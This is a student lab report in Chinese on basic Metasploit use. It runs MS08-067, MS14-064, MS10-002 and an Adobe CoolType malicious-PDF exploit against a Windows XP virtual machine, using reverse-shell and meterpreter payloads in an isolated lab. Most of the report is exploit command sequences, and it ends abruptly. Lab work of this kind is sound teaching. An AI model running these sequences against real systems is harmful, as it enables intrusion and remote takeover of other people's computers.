20174311 唐嘉 Exp6 MSF基础应用
一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点掌握常用的三种攻击方式的思路。
二、实践过程
靶机:Windows XP,IP地址为192.168.80.128
攻击机:IP地址为192.168.80.135
(一)主动攻击实践
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行。
攻击机与靶机能够互相ping通。(记得关xp的防火墙)
攻击机使用指令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.128查看靶机的ms08_067漏洞是否存在。可以看到漏洞是存在的。
打开msf,查看靶机445端口是否开放,可以看到445端口开放。
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.80.128
exploit
对靶机进行攻击。可以看到回连成功,输入ipconfig验证。
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.80.128
set LHOST 192.168.80.135
exploit
(二)针对浏览器的攻击
1.MS14_064漏洞
MS14_064漏洞是Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。远程攻击者利用此漏洞构造的网址执行任意代码,能够影响Win95+IE3—Win10+IE11的全版本。
use exploit/windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.80.128
set AllowPowerShellPrompt 1
set LHOST 192.168.80.135
set LPORT 4311
set target 0
exploit
在XP系统的浏览器中输入得到的URL中的网址,XP端完成打开网页后,在kali中Ctrl+C退出当前进程,输入sessions,可以看到当前建立了会话。
输入sessions -i 1获得第一个会话的链接,输入ipconfig,可以看到攻击成功。
2.MS10_002漏洞
MS10_002漏洞是针对微软Internet Explorer“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码use。
打开msf控制台,输入:
exploit/windows/browser/ms10_002_aurora
set paylaod windows/meterpreter/reverse_tcp
set srvhost 192.168.80.135
set lport 1211
在kali中Ctrl+C退出当前进程,输入sessions,可以看到当前建立的会话ID为1,输入sessions -i 1进入会话,即可回连成功。
(三)针对客户端的攻击
Adobe的攻击主要是通过社会工程学将文档发送给用户,打开文档就会触发恶意漏洞。
打开msf,输入以下指令:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set FILENAME 20174311.pdf
set LHOST 192.168.80.135
set RHOST 192.168.80.128
set LPORT 4311
exploit
根据文件存放的目录,用cp指令复制到桌面上,然后拖到主机桌面上,再移动到XP虚拟机中,同时将已经下载好的adobe软件拖到XP虚拟机中并安装。
返回kali端,输入back退出当前模块,输入如下指令进入监听模块开始监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.135 //攻击机IP
set LPORT 4311 //攻击机端口
exploit
靶机中打开pdf,然后在靶机中等待回连。
回连成功: